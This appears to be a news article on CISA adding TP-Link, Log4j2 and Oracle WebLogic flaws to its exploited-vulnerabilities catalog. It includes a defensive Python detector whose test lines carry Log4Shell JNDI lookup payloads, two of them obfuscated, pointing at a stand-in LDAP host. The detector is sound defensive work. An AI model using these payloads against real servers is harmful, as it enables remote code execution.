The Cybersecurity and Infrastructure Security Agency (CISA) has added TP-Link, Apache Log4j2 and Oracle WebLogic vulnerabilities to its Known Exploited Vulnerabilities Catalog.
CISA warned “these types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose a significant risk to the federal enterprise.”
As a result, these vulnerabilities have been added to the Catalog based on evidence of active exploitation.
On May 1, 2023, CISA added TP-Link Archer AX-21 Command Injection Vulnerability (CVE-2023-1389) to the Known Exploited Vulnerabilities Catalog.
Researchers at Tenable discovered an unauthenticated command injection vulnerability in the web management interface of the TP-Link Archer AX21 (AX1800).
TP-Link has released firmware version 1.1.4 Build 20230219 that fixes the issue by removing the vulnerable callback.
This vulnerability has a CVSS score of 8.8.
Apache Log4j2 CVE
In addition, CISA added an Apache Log4j2 Deserialization of Untrusted Data Vulnerability (CVE-2021-45046) to the Catalog of exploited vulnerabilities. The Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
According to Apache, the previous fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
Researchers first discovered the Critical Apache Log4j vulnerability (CVE-2021-44228) that could allow an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
As a result, the severe issue soon triggered a mad scramble by organizations to quickly patch the flaw and put up other blocking mitigations such as web application firewall (WAF) policies.
On December 10, 2021, Apache released a fix in Log4j 2.15.0 for Java 8 users to address CVE-2021-44228 that affected all Log4j versions from 2.0-beta9 to 2.14.1.
This vulnerability has a CVSS score of 9.0.
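As an added, defender-side example that is not from the original article or from Apache: the first function flags log or request lines carrying a Log4j lookup substitution attempt (the `${jndi:...}` pattern behind CVE-2021-44228), peeling the simple nested wrappers that hide the token from naive matching; the second reports whether a Log4j2 PatternLayout includes a Thread Context lookup (`${ctx:...}` or the `%X`/`%mdc` patterns), the non-default configuration on which CVE-2021-45046 depends. The sample lines and patterns are constructed, and the wrapper regex covers only the forms shown.

```python
import re

# Constructed sample lines (not from any real incident): access-log entries whose
# User-Agent field is the attacker-controlled string that ends up in a log message.
SAMPLE_LINES = [
    'GET /index.html HTTP/1.1 UA="Mozilla/5.0"',
    'GET / HTTP/1.1 UA="${jndi:ldap://example.invalid/a}"',
    'GET / HTTP/1.1 UA="${${lower:j}ndi:ldap://example.invalid/a}"',
    'GET / HTTP/1.1 UA="${${::-j}${::-n}${::-d}${::-i}:ldap://example.invalid/a}"',
    'GET /health HTTP/1.1 UA="curl/8.0"',
]

# One layer of the simple lookup wrappers used to hide the `jndi:` token:
# ${lower:X} / ${upper:X} -> X, and the default-value form ${anything:-X} -> X.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]+)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)
# Thread Context lookups in a PatternLayout: ${ctx:...} (usually written $${ctx:...}
# in log4j2.xml) and the %X / %mdc / %MDC conversion patterns.
_CTX = re.compile(r"\$\{\s*ctx\s*:|%(?:X|mdc|MDC)\b")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Peel nested wrappers from the inside out until nothing changes."""
    for _ in range(max_rounds):
        peeled = _WRAPPER.sub(lambda m: m.group(1) or m.group(2) or "", text)
        if peeled == text:
            break
        text = peeled
    return text


def find_lookup_attempts(lines):
    """Return (line_number, line) for each line carrying a JNDI lookup after normalization."""
    return [(n, line) for n, line in enumerate(lines, 1) if _JNDI.search(normalize(line))]


def context_lookup_in_pattern(pattern: str) -> bool:
    """True if the PatternLayout pulls Thread Context data into the message."""
    return _CTX.search(pattern) is not None


if __name__ == "__main__":
    for n, line in find_lookup_attempts(SAMPLE_LINES):
        print(f"line {n}: lookup attempt -> {normalize(line)}")
    for pattern in ["%d %p %c{1.} [%t] %m%n", "%d %p %c{1.} [%t] $${ctx:loginId} %m%n"]:
        print(f"{pattern!r}: context lookup = {context_lookup_in_pattern(pattern)}")
```

A line that is flagged warrants checking which Log4j version the receiving application runs and whether its layout uses a context lookup, since a 2.15.0 instance with such a pattern is still exposed.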
Oracle WebLogic CVE
Finally, CISA added an Oracle WebLogic Server Unspecified Vulnerability (CVE-2023-21839) to the Catalog. The issue affects Oracle Fusion Middleware (component: Core).
According to NIST, this “easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data.”
This vulnerability has a CVSS score of 7.5.